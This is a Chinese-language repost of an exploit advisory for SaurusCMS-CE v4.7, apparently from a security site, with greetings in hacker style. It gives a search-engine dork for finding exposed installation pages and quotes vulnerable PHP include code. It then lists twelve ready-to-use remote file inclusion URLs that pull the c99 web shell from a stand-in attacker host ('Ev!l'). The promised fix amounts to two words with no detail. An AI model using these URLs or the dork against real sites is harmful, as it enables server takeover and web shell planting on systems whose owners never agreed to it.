标题 : SaurusCMS-CE (CommunityEdition) v4.7 Multiple Vulnerabilities 作者: KedAns-Dz www.2cto.com 开发平台: php 类型: Multiple RFI 测试平台: Windows XP SP3 (en) 下载地址: [http://www.saurus.info/download/SaurusCMSCommunityEdition.zip] # Gr33ts t0 { Kha&miX }
------------------------------------------------------------------------- <+> (1) 安装文件泄露 : -------------------------------------------------------------------------
+> allintitle:"Saurus CMS CE Installation" +> site:[www.2cto.com] allintitle:"Saurus CMS CE Installation" -------------------------------------------------------------------------- <+> (2) 多个 RFI : -------------------------------------------------------------------------- [ PHP Code (1) =>
$class_path = $matches[1] == "editor" ? "classes/" : "./classes/"; include($class_path."port.inc.php");
<= END Code ]
http://www.2cto.com /[path]/file.php?class_path=http://Ev!l/c99.txt? http://www.2cto.com /[path]/image.php?class_path=http://Ev!l/c99.txt? http://www.2cto.com /[path]/doc.php?class_path=http://Ev!l/c99.txt? http://www.2cto.com /[path]/com_del.php?class_path=http://Ev!l/c99.txt? http://www.2cto.com /[path]/form.php?class_path=http://Ev!l/c99.txt? http://www.2cto.com /[path]/editor/file.php?class_path=http://Ev!l/c99.txt? http://www.2cto.com /[path]/editor/image.php?class_path=http://Ev!l/c99.txt? http://www.2cto.com /[path]/editor/doc.php?class_path=http://Ev!l/c99.txt? http://www.2cto.com /[path]/editor/com_del.php?class_path=http://Ev!l/c99.txt? http://www.2cto.com /[path]/editor/form.php?class_path=http://Ev!l/c99.txt? -------------------------------------------------------------------------- [ PHP Code (2) =>
include_once($class_path."timer.class.php"); if ($debug) { include_once($class_path."debug.inc.php"); } else { include_once($class_path."nodebug.inc.php"); } include_once($class_path."config.class.php");
<= END Code ]
http://www.2cto.com /[path]/styles.php?class_path=http://Ev!l/c99.txt? http://www.2cto.com /[path]/editor/styles.php?class_path=http://Ev!l/c99.txt?
-------------------------------------------------------------------------- 修复:针对性修复
查看更多关于SaurusCMS-CE (CommunityEdition) v4.7多重缺陷及修复 - 网的详细内容...